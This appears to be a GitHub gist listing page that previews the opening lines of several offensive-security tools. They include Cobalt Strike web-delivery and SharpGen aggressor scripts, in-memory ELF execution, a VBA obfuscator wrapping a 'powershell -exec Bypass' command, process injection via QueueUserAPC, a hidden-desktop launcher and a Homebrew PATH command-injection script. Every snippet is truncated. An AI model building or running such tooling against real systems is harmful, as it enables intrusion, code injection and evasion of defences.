Noah thesubtlety
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
| $sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
| $temppath = "/tmp/"; | |
| beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
| alias sharpgen{ | |
| $executionId = "sharpgen_" . int(rand() * 100000); | |
| $temporaryCsharp = $temppath . $executionId . ".cs"; | |
| $executableFilename = $temppath . $executionId . ".exe"; |
rsmudge
/ stagelesspython.cna
Created
April 26, 2017 18:15
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Python Stageless Scripted Web Delivery | |
| # setup our stageless Python Web Delivery attack | |
| sub setup_attack { | |
| local('%options $x86payload $x64payload $url $script'); | |
| %options = $3; | |
| # generate our stageless x86 payload | |
| artifact_stageless(%options["listener"], "raw", "x86", $null, $this); | |
| yield; |
capnspacehook
/ invokeInMemLinux.go
Created
February 21, 2019 13:37
Executes a binary or file in memory on a Linux system. Uses the memfd_create(2) syscall. Credits and idea from: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "io/ioutil" | |
| "os" | |
| "os/exec" | |
| "strconv" | |
| "syscall" |
khr0x40sh
/ Get-VBACHRObfuscatedString.ps1
Created
November 19, 2019 15:36
Takes a string and applies CHR(ascii int) & for each character in string
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Param([string]$string = "C:\windows\syswow64\windowspowershell\v1.0\powershell.exe -exec Bypass -nop ping 127.0.0.1" | |
| ); | |
| $result = "" | |
| $strA = $string.ToCharArray() | |
| for($i = 0; $i -lt $strA.Length; $i++) | |
| { | |
| $x = [byte]$strA[$i] | |
| $result += "Chr (" + $x.ToString() + ") & " | |
| } |
rsmudge
/ stagelessweb.cna
Last active
April 15, 2021 11:49
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Scripted Web Delivery (Stageless) | |
| # | |
| # This script demonstrates some of the new APIs in Cobalt Strike 3.7. | |
| # setup our stageless PowerShell Web Delivery attack | |
| sub setup_attack { | |
| local('%options $script $url $arch'); | |
| %options = $3; | |
| # get the arch right. |
audibleblink
/ system32_exports.txt
Created
March 18, 2021 17:43
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [*] - C:\Windows\System32\1028\VsGraphicsResources.dll | |
| [?] 64-bit Image! | |
| [>] Time Stamp: 12/31/1969 19:00:00 | |
| [>] Function Count: | |
| [>] Named Functions: | |
| [>] Ordinal Base: | |
| [>] Function Array RVA: 0x | |
| [>] Name Array RVA: 0x |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // To compile: gcc64.exe run.c -o run.exe | |
| // To run: run.exe cmd.exe "/c whoami" | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| int main(int argc, char **argv) { | |
| CHAR cDesktop[] = "hiddendesktop"; | |
| HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL); |
ropnop
/ go-sharp-loader.go
Created
August 5, 2020 17:12
Example Go file embedding multiple .NET executables
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Example Go program with multiple .NET Binaries embedded | |
| This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
| $ go get -u github.com/gobuffalo/packr/packr | |
| Place all your EXEs are in a "binaries" folder |
rvrsh3ll
/ DInjectQueuerAPC.cs
Created
November 20, 2020 15:10
— forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Command Injection via Homebrew $PATH trickery | |
| # n0ncetonic | |
| # Blacksun Research Labs 2019 | |
| # https://github.com/n0ncetonic | |
| # https://github.com/BlacksunLabs | |
| banner=$(/bin/cat <<EOF | |
OlderNewer